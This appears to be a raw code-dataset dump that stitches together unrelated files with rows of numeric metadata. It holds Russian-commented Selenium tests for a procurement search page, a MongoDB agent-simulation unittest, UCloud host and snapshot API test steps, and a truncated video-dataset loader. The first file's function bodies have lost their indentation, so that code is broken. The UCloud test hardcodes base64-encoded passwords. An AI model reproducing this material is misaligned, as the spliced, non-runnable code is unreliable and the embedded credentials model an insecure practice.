# Искать в контейнере (всего контейнеров + 1, номер контейнера(если 0 - случайный выбор), номер строки
# в контейнере если 0 - случайный выбор)
name = 'ETPRF'
app.testHelperSMSearch.select_first_publish_date(4, 0)
app.testHelperSMSearch.find_torgovaya_ploschadka(name)
app.testHelperSMSearch.find_in_container_number(11, 2, 1)
app.testHelperSMSearch.find_in_container_number(11, 6, 3)
app.testHelperSMSearch.find_in_container_number(11, 6, 4)
app.testHelperSMSearch.press_search_button()
assert app.testHelperSMSearch.check_results() != '0'
assert int(app.testHelperSMSearch.check_results()) > 120
def test_sm_etprf_include_eic_current_month(app):
app.testhelpersm.refresh_page()
app.session.open_SM_page(app.smPurchases)
app.session.ensure_login_sm(app.username, app.password)
app.session.ensure_login_sm(app.username, app.password)
app.session.open_SM_page(app.smPurchases)
app.testHelperSMSearch.expand_show_hide()
# Искать в контейнере (всего контейнеров + 1, номер контейнера(если 0 - случайный выбор), номер строки
# в контейнере если 0 - случайный выбор)
name = 'ETPRF'
app.testHelperSMSearch.select_first_publish_date(5, 0)
app.testHelperSMSearch.find_torgovaya_ploschadka(name)
app.testHelperSMSearch.press_search_button()
assert app.testHelperSMSearch.check_results() != '0'
assert int(app.testHelperSMSearch.check_results()) > int(app.testHelperSMSearch.current_date_time_day())*100
def test_sm_etprf_without_eic_current_month(app):
app.testhelpersm.refresh_page()
app.session.open_SM_page(app.smPurchases)
app.session.ensure_login_sm(app.username, app.password)
app.session.ensure_login_sm(app.username, app.password)
app.session.open_SM_page(app.smPurchases)
app.testHelperSMSearch.expand_show_hide()
# Искать в контейнере (всего контейнеров + 1, номер контейнера(если 0 - случайный выбор), номер строки
# в контейнере если 0 - случайный выбор)
name = 'ETPRF'
app.testHelperSMSearch.select_first_publish_date(5, 0)
app.testHelperSMSearch.find_torgovaya_ploschadka(name)
app.testHelperSMSearch.find_in_container_number(11, 2, 1)
app.testHelperSMSearch.find_in_container_number(11, 6, 3)
app.testHelperSMSearch.find_in_container_number(11, 6, 4)
app.testHelperSMSearch.press_search_button()
assert app.testHelperSMSearch.check_results() != '0'
assert int(app.testHelperSMSearch.check_results()) > int(app.testHelperSMSearch.current_date_time_day())*20
def test_sm_etprf_include_eic_prev_month(app):
app.testhelpersm.refresh_page()
app.session.open_SM_page(app.smPurchases)
app.session.ensure_login_sm(app.username, app.password)
app.session.ensure_login_sm(app.username, app.password)
app.session.open_SM_page(app.smPurchases)
app.testHelperSMSearch.expand_show_hide()
# Искать в контейнере (всего контейнеров + 1, номер контейнера(если 0 - случайный выбор), номер строки
# в контейнере если 0 - случайный выбор)
name = 'ETPRF'
app.testHelperSMSearch.select_first_publish_date(6, 0)
app.testHelperSMSearch.find_torgovaya_ploschadka(name)
app.testHelperSMSearch.press_search_button()
assert app.testHelperSMSearch.check_results() != '0'
assert int(app.testHelperSMSearch.check_results()) > 3500
def test_sm_etprf_without_eic_prev_month(app):
app.testhelpersm.refresh_page()
app.session.open_SM_page(app.smPurchases)
app.session.ensure_login_sm(app.username, app.password)
app.session.ensure_login_sm(app.username, app.password)
app.session.open_SM_page(app.smPurchases)
app.testHelperSMSearch.expand_show_hide()
# Искать в контейнере (всего контейнеров + 1, номер контейнера(если 0 - случайный выбор), номер строки
# в контейнере если 0 - случайный выбор)
name = 'ETPRF'
app.testHelperSMSearch.select_first_publish_date(6, 0)
app.testHelperSMSearch.find_torgovaya_ploschadka(name)
app.testHelperSMSearch.find_in_container_number(11, 2, 1)
app.testHelperSMSearch.find_in_container_number(11, 6, 3)
app.testHelperSMSearch.find_in_container_number(11, 6, 4)
app.testHelperSMSearch.press_search_button()
assert app.testHelperSMSearch.check_results() != '0'
assert int(app.testHelperSMSearch.check_results()) > 600
| 48.021277
| 112
| 0.772818
| 1,187
| 9,028
| 5.617523
| 0.062342
| 0.242502
| 0.093731
| 0.04799
| 0.99865
| 0.99865
| 0.986053
| 0.979304
| 0.979304
| 0.979304
| 0
| 0.019361
| 0.130372
| 9,028
| 188
| 113
| 48.021277
| 0.829958
| 0.154962
| 0
| 0.903448
| 0
| 0
| 0.007889
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 1
| 0.068966
| false
| 0.137931
| 0
| 0
| 0.068966
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
1e99308ac1e7db45f504c3ecd96b9eaf81a98fed
| 5,217
|
py
|
Python
|
tests/services.py
|
mabdi/VirtIOT
|
44a9336db16761a446517bbcd59b2f5dd7fe2216
|
[
"MIT"
] | 1
|
2018-08-04T17:13:02.000Z
|
2018-08-04T17:13:02.000Z
|
tests/services.py
|
mabdi/CSIoT
|
44a9336db16761a446517bbcd59b2f5dd7fe2216
|
[
"MIT"
] | null | null | null |
tests/services.py
|
mabdi/CSIoT
|
44a9336db16761a446517bbcd59b2f5dd7fe2216
|
[
"MIT"
] | null | null | null |
import unittest
from core import app,agent,simulation
from core.common import get_conn
class ServicesTestCase(unittest.TestCase):
def test_consume_f(self):
"""consume friend services test"""
agent.deleteAll()
simulation.clear_all_messages()
simulation.reset_ts()
a = agent.random_agent()
b = agent.random_agent()
a["agentName"] = "a"
a["agentX"] = str(100)
a["agentY"] = str(100)
a["agentOwner"] = str(50)
a["agentBatch"] = str(50)
a["agentLocality"] = str(100)
b["agentName"] = "b"
b["agentX"] = str(450)
b["agentY"] = str(100)
b["agentOwner"] = str(50)
b["agentBatch"] = str(51)
b["agentLocality"] = str(100)
agent.new_agent(0,a)
agent.new_agent(0,b)
db = get_conn()
db.agents.find_one_and_update({"name":"a"},{"$set":{"service_need":{"10":None}}})
db.agents.find_one_and_update({"name":"b"},{"$set":{"service_offer":["10"]}})
simulation.start(3)
ag = {a["name"]:a for a in db.agents.find()}
self.assertTrue( "a" in ag["b"]["friendships"])
self.assertTrue( "b" in ag["a"]["friendships"])
self.assertTrue( "b" == ag["a"]["service_need"]["10"])
def test_consume_ff(self):
"""consume friend of friends services test"""
agent.deleteAll()
simulation.clear_all_messages()
simulation.reset_ts()
a = agent.random_agent()
b = agent.random_agent()
c = agent.random_agent()
a["agentName"] = "a"
a["agentX"] = str(100)
a["agentY"] = str(100)
a["agentOwner"] = str(50)
a["agentBatch"] = str(50)
a["agentLocality"] = str(100)
b["agentName"] = "b"
b["agentX"] = str(450)
b["agentY"] = str(100)
b["agentOwner"] = str(50)
b["agentBatch"] = str(51)
b["agentLocality"] = str(100)
c["agentName"] = "c"
c["agentX"] = str(950)
c["agentY"] = str(100)
c["agentOwner"] = str(52)
c["agentBatch"] = str(51)
c["agentLocality"] = str(50)
agent.new_agent(0,a)
agent.new_agent(0,b)
agent.new_agent(0,c)
db = get_conn()
db.agents.find_one_and_update({"name":"a"},{"$set":{"service_need":{"10":None}}})
db.agents.find_one_and_update({"name":"a"},{"$set":{"service_offer":["5"]}})
db.agents.find_one_and_update({"name":"b"},{"$set":{"service_need":{"20":None}}})
db.agents.find_one_and_update({"name":"b"},{"$set":{"service_offer":["11"]}})
db.agents.find_one_and_update({"name":"c"},{"$set":{"service_need":{"12":None}}})
db.agents.find_one_and_update({"name":"c"},{"$set":{"service_offer":["10"]}})
simulation.start(3)
ag = {a["name"]:a for a in db.agents.find()}
print(ag)
self.assertTrue( "a" in ag["b"]["friendships"])
self.assertTrue( "b" in ag["a"]["friendships"])
self.assertTrue( "c" in ag["b"]["friendships"])
self.assertTrue( "c" == ag["a"]["service_need"]["10"])
def test_consume_fff(self):
"""consume friend of friend of friends services test"""
agent.deleteAll()
simulation.clear_all_messages()
simulation.reset_ts()
a = agent.random_agent()
b = agent.random_agent()
c = agent.random_agent()
d = agent.random_agent()
a["agentName"] = "a"
a["agentX"] = str(100)
a["agentY"] = str(100)
a["agentOwner"] = str(50)
a["agentBatch"] = str(50)
a["agentLocality"] = str(100)
b["agentName"] = "b"
b["agentX"] = str(450)
b["agentY"] = str(100)
b["agentOwner"] = str(50)
b["agentBatch"] = str(51)
b["agentLocality"] = str(100)
c["agentName"] = "c"
c["agentX"] = str(950)
c["agentY"] = str(100)
c["agentOwner"] = str(52)
c["agentBatch"] = str(51)
c["agentLocality"] = str(50)
d["agentName"] = "d"
d["agentX"] = str(950)
d["agentY"] = str(400)
d["agentOwner"] = str(52)
d["agentBatch"] = str(54)
d["agentLocality"] = str(50)
agent.new_agent(0,a)
agent.new_agent(0,b)
agent.new_agent(0,c)
agent.new_agent(0,d)
db = get_conn()
db.agents.find_one_and_update({"name":"a"},{"$set":{"service_need":{"10":None}}})
db.agents.find_one_and_update({"name":"a"},{"$set":{"service_offer":["5"]}})
db.agents.find_one_and_update({"name":"b"},{"$set":{"service_need":{"20":None}}})
db.agents.find_one_and_update({"name":"b"},{"$set":{"service_offer":["11"]}})
db.agents.find_one_and_update({"name":"c"},{"$set":{"service_need":{"12":None}}})
db.agents.find_one_and_update({"name":"c"},{"$set":{"service_offer":["13"]}})
db.agents.find_one_and_update({"name":"d"},{"$set":{"service_need":{"15":None}}})
db.agents.find_one_and_update({"name":"d"},{"$set":{"service_offer":["10"]}})
simulation.start(3)
ag = {a["name"]:a for a in db.agents.find()}
self.assertTrue( "a" in ag["b"]["friendships"])
self.assertTrue( "b" in ag["a"]["friendships"])
self.assertTrue( "c" in ag["b"]["friendships"])
self.assertTrue( "d" in ag["c"]["friendships"])
self.assertTrue( "d" == ag["a"]["service_need"]["10"])
| 32.203704
| 87
| 0.560092
| 703
| 5,217
| 4.008535
| 0.112376
| 0.053939
| 0.080908
| 0.085167
| 0.889283
| 0.883605
| 0.883605
| 0.883605
| 0.860894
| 0.860894
| 0
| 0.039483
| 0.213533
| 5,217
| 161
| 88
| 32.403727
| 0.647331
| 0.022618
| 0
| 0.801587
| 0
| 0
| 0.205865
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 1
| 0.02381
| false
| 0
| 0.02381
| 0
| 0.055556
| 0.007937
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1eb6a8de3d14221782fc2a2b6f6163290af599a8
| 20,257
|
py
|
Python
|
tests/test_services/test_set_867.py
|
yangyimincn/ucloud-sdk-python3
|
9732d67f32ec5f46467458ba655c44c193a6bbff
|
[
"Apache-2.0"
] | 37
|
2019-06-19T09:41:34.000Z
|
2022-02-18T08:06:00.000Z
|
tests/test_services/test_set_867.py
|
yangyimincn/ucloud-sdk-python3
|
9732d67f32ec5f46467458ba655c44c193a6bbff
|
[
"Apache-2.0"
] | 90
|
2019-08-09T09:27:33.000Z
|
2022-03-30T15:54:55.000Z
|
tests/test_services/test_set_867.py
|
yangyimincn/ucloud-sdk-python3
|
9732d67f32ec5f46467458ba655c44c193a6bbff
|
[
"Apache-2.0"
] | 19
|
2019-06-13T02:46:01.000Z
|
2021-11-01T07:22:18.000Z
|
""" Code is generated by ucloud-model, DO NOT EDIT IT. """
import pytest
import logging
from ucloud.core import exc
from ucloud.testing import env, funcs, op, utest
logger = logging.getLogger(__name__)
scenario = utest.Scenario(867)
@pytest.mark.skipif(env.is_ut(), reason=env.get_skip_reason())
def test_set_867(client: utest.Client, variables: dict):
scenario.initial(variables)
scenario.variables["Password"] = "Z3VhbmxpeXVhbm1pbWExMjMhQCM="
scenario.variables["SnapshotSysName"] = "snapshot-ARK-SYS-01"
scenario.variables["SnapshotSysDesc"] = "snapshot-ARK-SYS-01-desc"
scenario.variables["SnapDiskType"] = "LocalBoot"
scenario.variables["SnapshotDataNameModify"] = "snapshot-ARK-DATA-01-modify"
scenario.variables[
"SnapshotDataDescModify"
] = "snapshot-ARK-DATA-01-desc-Modify"
scenario.variables["UhostName"] = "uhost-snapshot-ARK-auto-api-1"
scenario.variables["SnapshotDataName"] = "snapshot-ARK-DATA-01"
scenario.variables["SnapshotDataDesc"] = "snapshot-ARK-DATA-01-desc"
scenario.variables[
"CreateFromTimeMachinePassword"
] = "Z3VhbmxpeXVhbm1pbWExMjMhQCM="
scenario.variables["ImageID"] = "#{u_get_image_resource($Region,$Zone)}"
scenario.run(client)
@scenario.step(
max_retries=3,
retry_interval=1,
startup_delay=0,
fast_fail=False,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "Action", "DescribeImageResponse"),
],
action="DescribeImage",
)
def describe_image_00(client: utest.Client, variables: dict):
d = {
"Zone": variables.get("Zone"),
"Region": variables.get("Region"),
"OsType": "Linux",
"ImageType": "Base",
}
try:
resp = client.uhost().describe_image(d)
except exc.RetCodeException as e:
resp = e.json()
variables["ImageID"] = utest.value_at_path(resp, "ImageSet.0.ImageId")
return resp
@scenario.step(
max_retries=3,
retry_interval=1,
startup_delay=0,
fast_fail=True,
validators=lambda variables: [("str_eq", "RetCode", 0)],
action="CreateUHostInstance",
)
def create_uhost_instance_01(client: utest.Client, variables: dict):
d = {
"Zone": variables.get("Zone"),
"TimemachineFeature": "no",
"Region": variables.get("Region"),
"Password": "VXFhNzg5VGVzdCFAIyQ7LA==",
"Name": variables.get("UhostName"),
"Memory": 1024,
"LoginMode": "Password",
"ImageId": variables.get("ImageID"),
"HotplugFeature": False,
"GPU": False,
"DiskSpace": 10,
"CPU": 1,
}
try:
resp = client.uhost().create_uhost_instance(d)
except exc.RetCodeException as e:
resp = e.json()
variables["hostId"] = utest.value_at_path(resp, "UHostIds.0")
return resp
@scenario.step(
max_retries=100,
retry_interval=30,
startup_delay=10,
fast_fail=True,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "UHostSet.0.State", "Running"),
("str_eq", "UHostSet.0.TimemachineFeature", "no"),
("str_eq", "UHostSet.0.BootDiskState", "Normal"),
],
action="DescribeUHostInstance",
)
def describe_uhost_instance_02(client: utest.Client, variables: dict):
d = {
"Zone": variables.get("Zone"),
"UHostIds": [variables.get("hostId")],
"Region": variables.get("Region"),
}
try:
resp = client.uhost().describe_uhost_instance(d)
except exc.RetCodeException as e:
resp = e.json()
return resp
@scenario.step(
max_retries=3,
retry_interval=1,
startup_delay=0,
fast_fail=True,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "Action", "StopUHostInstanceResponse"),
],
action="StopUHostInstance",
)
def stop_uhost_instance_03(client: utest.Client, variables: dict):
d = {
"Zone": variables.get("Zone"),
"UHostId": variables.get("hostId"),
"Region": variables.get("Region"),
}
try:
resp = client.uhost().stop_uhost_instance(d)
except exc.RetCodeException as e:
resp = e.json()
return resp
@scenario.step(
max_retries=10,
retry_interval=10,
startup_delay=10,
fast_fail=True,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "UHostSet.0.State", "Stopped"),
],
action="DescribeUHostInstance",
)
def describe_uhost_instance_04(client: utest.Client, variables: dict):
d = {
"Zone": variables.get("Zone"),
"UHostIds": [variables.get("hostId")],
"Region": variables.get("Region"),
}
try:
resp = client.uhost().describe_uhost_instance(d)
except exc.RetCodeException as e:
resp = e.json()
return resp
@scenario.step(
max_retries=3,
retry_interval=1,
startup_delay=0,
fast_fail=True,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "Action", "UpgradeToArkUHostInstanceResponse"),
],
action="UpgradeToArkUHostInstance",
)
def upgrade_to_ark_uhost_instance_05(client: utest.Client, variables: dict):
d = {
"Zone": variables.get("Zone"),
"UHostIds": [variables.get("hostId")],
"Region": variables.get("Region"),
}
try:
resp = client.uhost().upgrade_to_ark_uhost_instance(d)
except exc.RetCodeException as e:
resp = e.json()
return resp
@scenario.step(
max_retries=200,
retry_interval=30,
startup_delay=100,
fast_fail=True,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "UHostSet.0.State", "Stopped"),
("str_eq", "UHostSet.0.TimemachineFeature", "yes"),
("str_eq", "UHostSet.0.BootDiskState", "Normal"),
("str_eq", "UHostSet.0.DiskSet.0.BackupType", "DATAARK"),
],
action="DescribeUHostInstance",
)
def describe_uhost_instance_06(client: utest.Client, variables: dict):
d = {
"Zone": variables.get("Zone"),
"UHostIds": [variables.get("hostId")],
"Region": variables.get("Region"),
}
try:
resp = client.uhost().describe_uhost_instance(d)
except exc.RetCodeException as e:
resp = e.json()
return resp
@scenario.step(
max_retries=3,
retry_interval=1,
startup_delay=0,
fast_fail=True,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "Action", "StartUHostInstanceResponse"),
],
action="StartUHostInstance",
)
def start_uhost_instance_07(client: utest.Client, variables: dict):
d = {
"Zone": variables.get("Zone"),
"UHostId": variables.get("hostId"),
"Region": variables.get("Region"),
}
try:
resp = client.uhost().start_uhost_instance(d)
except exc.RetCodeException as e:
resp = e.json()
return resp
@scenario.step(
max_retries=30,
retry_interval=30,
startup_delay=10,
fast_fail=True,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "UHostSet.0.State", "Running"),
("str_eq", "UHostSet.0.TimemachineFeature", "yes"),
("str_eq", "UHostSet.0.DiskSet.0.BackupType", "DATAARK"),
],
action="DescribeUHostInstance",
)
def describe_uhost_instance_08(client: utest.Client, variables: dict):
d = {
"Zone": variables.get("Zone"),
"UHostIds": [variables.get("hostId")],
"Region": variables.get("Region"),
}
try:
resp = client.uhost().describe_uhost_instance(d)
except exc.RetCodeException as e:
resp = e.json()
return resp
@scenario.step(
max_retries=60,
retry_interval=60,
startup_delay=100,
fast_fail=True,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "Action", "DescribeUhostTmMetaResponse"),
("str_eq", "UtmStatus", "normal"),
],
action="DescribeUhostTmMeta",
)
def describe_uhost_tm_meta_09(client: utest.Client, variables: dict):
d = {
"Zone": variables.get("Zone"),
"UhostId": variables.get("hostId"),
"Region": variables.get("Region"),
}
try:
resp = client.invoke("DescribeUhostTmMeta", d)
except exc.RetCodeException as e:
resp = e.json()
variables["VdiskIdSys"] = utest.value_at_path(resp, "DataSet.0.VdiskId")
variables["VdiskIdData"] = utest.value_at_path(resp, "DataSet.1.VdiskId")
return resp
@scenario.step(
max_retries=3,
retry_interval=1,
startup_delay=0,
fast_fail=True,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "Action", "DescribeVDiskTmListResponse"),
],
action="DescribeVDiskTmList",
)
def describe_v_disk_tm_list_10(client: utest.Client, variables: dict):
d = {
"Zone": variables.get("Zone"),
"VDiskId": variables.get("VdiskIdSys"),
"SnapshotType": "all",
"Region": variables.get("Region"),
}
try:
resp = client.invoke("DescribeVDiskTmList", d)
except exc.RetCodeException as e:
resp = e.json()
return resp
@scenario.step(
max_retries=3,
retry_interval=1,
startup_delay=0,
fast_fail=True,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "Action", "DescribeVDiskTmListResponse"),
],
action="DescribeVDiskTmList",
)
def describe_v_disk_tm_list_11(client: utest.Client, variables: dict):
d = {
"Zone": variables.get("Zone"),
"VDiskId": variables.get("VdiskIdData"),
"SnapshotType": "all",
"Region": variables.get("Region"),
}
try:
resp = client.invoke("DescribeVDiskTmList", d)
except exc.RetCodeException as e:
resp = e.json()
return resp
@scenario.step(
max_retries=3,
retry_interval=1,
startup_delay=0,
fast_fail=True,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "Action", "CreateUserVDiskSnapshotResponse"),
],
action="CreateUserVDiskSnapshot",
)
def create_user_v_disk_snapshot_12(client: utest.Client, variables: dict):
d = {
"Zone": variables.get("Zone"),
"VDiskId": variables.get("VdiskIdSys"),
"Region": variables.get("Region"),
"Name": variables.get("SnapshotSysName"),
"Comment": variables.get("SnapshotSysDesc"),
}
try:
resp = client.invoke("CreateUserVDiskSnapshot", d)
except exc.RetCodeException as e:
resp = e.json()
variables["VdiskSnapIDSys"] = utest.value_at_path(resp, "SnapshotId.0")
return resp
@scenario.step(
max_retries=3,
retry_interval=1,
startup_delay=0,
fast_fail=True,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "Action", "CreateUserVDiskSnapshotResponse"),
],
action="CreateUserVDiskSnapshot",
)
def create_user_v_disk_snapshot_13(client: utest.Client, variables: dict):
d = {
"Zone": variables.get("Zone"),
"VDiskId": variables.get("VdiskIdData"),
"Region": variables.get("Region"),
"Name": variables.get("SnapshotDataName"),
"Comment": variables.get("SnapshotDataDesc"),
}
try:
resp = client.invoke("CreateUserVDiskSnapshot", d)
except exc.RetCodeException as e:
resp = e.json()
variables["VdiskSnapIDData"] = utest.value_at_path(resp, "SnapshotId.0")
return resp
@scenario.step(
max_retries=30,
retry_interval=30,
startup_delay=10,
fast_fail=True,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "Action", "DescribeSnapshotResponse"),
(
"str_eq",
"UHostSnapshotSet.0.SnapshotId",
variables.get("VdiskSnapIDSys"),
),
(
"str_eq",
"UHostSnapshotSet.0.SnapshotName",
variables.get("SnapshotSysName"),
),
("str_eq", "UHostSnapshotSet.0.DiskType", "LocalBoot"),
(
"str_eq",
"UHostSnapshotSet.0.ResourceName",
variables.get("UhostName"),
),
(
"str_eq",
"UHostSnapshotSet.0.SnapshotDescription",
variables.get("SnapshotSysDesc"),
),
("str_eq", "UHostSnapshotSet.0.State", "Normal"),
],
action="DescribeSnapshot",
)
def describe_snapshot_14(client: utest.Client, variables: dict):
d = {
"Zone": variables.get("Zone"),
"UHostId": variables.get("hostId"),
"SnapshotIds": [variables.get("VdiskSnapIDSys")],
"Region": variables.get("Region"),
}
try:
resp = client.invoke("DescribeSnapshot", d)
except exc.RetCodeException as e:
resp = e.json()
return resp
@scenario.step(
max_retries=30,
retry_interval=10,
startup_delay=10,
fast_fail=True,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "Action", "DescribeSnapshotResponse"),
(
"str_eq",
"UHostSnapshotSet.0.SnapshotId",
variables.get("VdiskSnapIDData"),
),
(
"str_eq",
"UHostSnapshotSet.0.SnapshotName",
variables.get("SnapshotDataName"),
),
("str_eq", "UHostSnapshotSet.0.DiskType", "LocalData"),
(
"str_eq",
"UHostSnapshotSet.0.ResourceName",
variables.get("UhostName"),
),
(
"str_eq",
"UHostSnapshotSet.0.SnapshotDescription",
variables.get("SnapshotDataDesc"),
),
("str_eq", "UHostSnapshotSet.0.State", "Normal"),
],
action="DescribeSnapshot",
)
def describe_snapshot_15(client: utest.Client, variables: dict):
d = {
"Zone": variables.get("Zone"),
"UHostId": variables.get("hostId"),
"SnapshotIds": [variables.get("VdiskSnapIDData")],
"Region": variables.get("Region"),
}
try:
resp = client.invoke("DescribeSnapshot", d)
except exc.RetCodeException as e:
resp = e.json()
return resp
@scenario.step(
max_retries=3,
retry_interval=1,
startup_delay=0,
fast_fail=True,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "Action", "ModifySnapshotResponse"),
],
action="ModifySnapshot",
)
def modify_snapshot_16(client: utest.Client, variables: dict):
d = {
"Zone": variables.get("Zone"),
"SnapshotName": variables.get("SnapshotDataNameModify"),
"SnapshotId": variables.get("VdiskSnapIDData"),
"SnapshotDescription": variables.get("SnapshotDataDescModify"),
"Region": variables.get("Region"),
}
try:
resp = client.invoke("ModifySnapshot", d)
except exc.RetCodeException as e:
resp = e.json()
return resp
@scenario.step(
max_retries=3,
retry_interval=10,
startup_delay=10,
fast_fail=True,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "Action", "DescribeSnapshotResponse"),
(
"str_eq",
"UHostSnapshotSet.0.SnapshotId",
variables.get("VdiskSnapIDData"),
),
(
"str_eq",
"UHostSnapshotSet.0.SnapshotName",
variables.get("SnapshotDataNameModify"),
),
("str_eq", "UHostSnapshotSet.0.DiskType", "LocalData"),
(
"str_eq",
"UHostSnapshotSet.0.ResourceName",
variables.get("UhostName"),
),
(
"str_eq",
"UHostSnapshotSet.0.SnapshotDescription",
variables.get("SnapshotDataDescModify"),
),
("str_eq", "UHostSnapshotSet.0.State", "Normal"),
],
action="DescribeSnapshot",
)
def describe_snapshot_17(client: utest.Client, variables: dict):
d = {
"Zone": variables.get("Zone"),
"UHostId": variables.get("hostId"),
"SnapshotIds": [variables.get("VdiskSnapIDData")],
"Region": variables.get("Region"),
}
try:
resp = client.invoke("DescribeSnapshot", d)
except exc.RetCodeException as e:
resp = e.json()
return resp
@scenario.step(
max_retries=3,
retry_interval=1,
startup_delay=0,
fast_fail=True,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "Action", "DeleteSnapshotResponse"),
],
action="DeleteSnapshot",
)
def delete_snapshot_18(client: utest.Client, variables: dict):
d = {
"Zone": variables.get("Zone"),
"SnapshotId": variables.get("VdiskSnapIDSys"),
"Region": variables.get("Region"),
}
try:
resp = client.invoke("DeleteSnapshot", d)
except exc.RetCodeException as e:
resp = e.json()
return resp
@scenario.step(
max_retries=3,
retry_interval=1,
startup_delay=0,
fast_fail=True,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "Action", "DeleteSnapshotResponse"),
],
action="DeleteSnapshot",
)
def delete_snapshot_19(client: utest.Client, variables: dict):
d = {
"Zone": variables.get("Zone"),
"SnapshotId": variables.get("VdiskSnapIDData"),
"Region": variables.get("Region"),
}
try:
resp = client.invoke("DeleteSnapshot", d)
except exc.RetCodeException as e:
resp = e.json()
return resp
@scenario.step(
max_retries=3,
retry_interval=30,
startup_delay=10,
fast_fail=True,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "Action", "DescribeSnapshotResponse"),
(
"object_not_contains",
"UHostSnapshotSet",
variables.get("VdiskSnapIDSys"),
),
(
"object_not_contains",
"UHostSnapshotSet",
variables.get("VdiskSnapIDData"),
),
],
action="DescribeSnapshot",
)
def describe_snapshot_20(client: utest.Client, variables: dict):
d = {"Zone": variables.get("Zone"), "Region": variables.get("Region")}
try:
resp = client.invoke("DescribeSnapshot", d)
except exc.RetCodeException as e:
resp = e.json()
return resp
@scenario.step(
max_retries=3,
retry_interval=1,
startup_delay=0,
fast_fail=True,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "Action", "StopUHostInstanceResponse"),
],
action="StopUHostInstance",
)
def stop_uhost_instance_21(client: utest.Client, variables: dict):
d = {
"Zone": variables.get("Zone"),
"UHostId": variables.get("hostId"),
"Region": variables.get("Region"),
}
try:
resp = client.uhost().stop_uhost_instance(d)
except exc.RetCodeException as e:
resp = e.json()
return resp
@scenario.step(
max_retries=30,
retry_interval=10,
startup_delay=10,
fast_fail=True,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "UHostSet.0.State", "Stopped"),
],
action="DescribeUHostInstance",
)
def describe_uhost_instance_22(client: utest.Client, variables: dict):
d = {
"Zone": variables.get("Zone"),
"UHostIds": [variables.get("hostId")],
"Region": variables.get("Region"),
}
try:
resp = client.uhost().describe_uhost_instance(d)
except exc.RetCodeException as e:
resp = e.json()
return resp
@scenario.step(
max_retries=3,
retry_interval=1,
startup_delay=0,
fast_fail=True,
validators=lambda variables: [
("str_eq", "RetCode", 0),
("str_eq", "Action", "TerminateUHostInstanceResponse"),
],
action="TerminateUHostInstance",
)
def terminate_uhost_instance_23(client: utest.Client, variables: dict):
d = {
"Zone": variables.get("Zone"),
"UHostId": variables.get("hostId"),
"Region": variables.get("Region"),
}
try:
resp = client.uhost().terminate_uhost_instance(d)
except exc.RetCodeException as e:
resp = e.json()
return resp
| 26.514398
| 80
| 0.603791
| 2,065
| 20,257
| 5.779177
| 0.104116
| 0.09452
| 0.035613
| 0.054466
| 0.81691
| 0.795039
| 0.774342
| 0.761019
| 0.756913
| 0.756913
| 0
| 0.016124
| 0.246828
| 20,257
| 763
| 81
| 26.549148
| 0.766075
| 0.002468
| 0
| 0.738204
| 1
| 0
| 0.241943
| 0.092183
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038052
| false
| 0.006088
| 0.006088
| 0
| 0.08067
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1eca5040063c79932c73223d4f412a91e61d79e8
| 2,857
|
py
|
Python
|
dataset_decoder.py
|
okwrtdsh/3D-ResNets-PyTorch
|
f36a32ea8b283524d1d102937c49689b1f475b5f
|
[
"MIT"
] | null | null | null |
dataset_decoder.py
|
okwrtdsh/3D-ResNets-PyTorch
|
f36a32ea8b283524d1d102937c49689b1f475b5f
|
[
"MIT"
] | null | null | null |
dataset_decoder.py
|
okwrtdsh/3D-ResNets-PyTorch
|
f36a32ea8b283524d1d102937c49689b1f475b5f
|
[
"MIT"
] | null | null | null |
from datasets.ucf101_decoder import UCF101
def get_training_set(opt,
common_temporal_transform,
common_spatial_transform,
target_spatial_transform,
input_spatial_transform,
target_label_transform
):
assert opt.dataset in [
'ucf101',
]
if opt.dataset == 'ucf101':
training_data = UCF101(
opt.video_path,
opt.annotation_path,
'training',
common_temporal_transform=common_temporal_transform,
common_spatial_transform=common_spatial_transform,
target_spatial_transform=target_spatial_transform,
input_spatial_transform=input_spatial_transform,
target_label_transform=target_label_transform,
sample_duration=opt.sample_duration)
return training_data
def get_validation_set(opt,
common_temporal_transform,
common_spatial_transform,
target_spatial_transform,
input_spatial_transform,
target_label_transform
):
